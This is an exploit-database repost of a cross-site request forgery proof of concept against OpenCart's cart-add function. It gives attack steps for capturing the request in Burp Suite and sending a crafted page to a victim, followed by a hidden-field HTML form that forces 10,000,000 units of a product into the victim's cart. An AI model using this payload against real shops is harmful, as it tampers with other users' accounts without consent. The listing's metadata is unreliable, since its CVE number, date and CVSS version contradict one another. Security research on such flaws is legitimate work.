OpenCart Cross Site Request Forgery

CVE Category Price Severity
CVE-2021-39355 CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-10
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

OpenCart Cross Site Request Forgery
# Exploit Title: OpenCart - Cross Site Request Forgery
# Date: 12-11-2020
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage:
# Software Link:
# Version: OpenCart CMS - 
# Tested on: Kali Linux

This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart.

#Additional Information:
well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability.
Attack Vector:
1. create two accounts A(attacker) & B(victim)
2. login with A and add a product in cart and capture that particular request in burpsuite.
3. Now change the quantity if want and then create a csrf poc of that request.
4. Save it as .html and send it to victim. Now the product added to victims cart.

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">
      <input type="hidden" name="product_id" value="43" />
      <input type="hidden" name="quantity" value="10000000" />
      <input type="submit" value="Submit request" />

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum